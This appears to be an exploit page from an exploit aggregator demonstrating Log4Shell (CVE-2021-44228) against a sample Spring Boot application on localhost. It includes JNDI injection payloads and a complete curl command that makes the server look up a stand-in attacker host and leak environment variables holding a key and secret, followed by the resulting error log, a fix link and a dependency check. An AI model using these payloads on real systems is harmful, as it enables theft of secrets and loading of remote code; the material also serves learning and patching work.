Share
## https://sploitus.com/exploit?id=141F2E38-979B-50B5-B649-96785B255523
# Log4Shell (CVE-2021-44228) is a zero-day vulnerability in Log4j

## Log4J Vulnerability

**Discovered:** 24th November 2021

**Patched:** 6th December 2021

## Sample application
This sample application is spring boot application, and is using log4j as a logging framework, and running with following environment variables on port 8080 at localhost 

Check out video explanation:

https://youtu.be/bb6pgWrm7tA

**Environment variables**

`key=jason.bourne;secret=Treadstone`

## Attack

**POST** http://localhost:8080//v1/public/log-test

**Parameter:**

value=${jndi:ldap://some-random-hacking-site.com}

![Attack from client](attack-img.png)

## Get environment variables
By using following string you can get environment variables
`value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}`

### Curl command
`curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'`


## Log Console

`2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect]
at com.sun.jndi.ldap.Connection.<init>(Connection.java:243)
at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
`

## Fix
https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot

## Confirmation
`mvn dependency:tree`
Make sure none of dependent jars point to Vulnerable log4j version.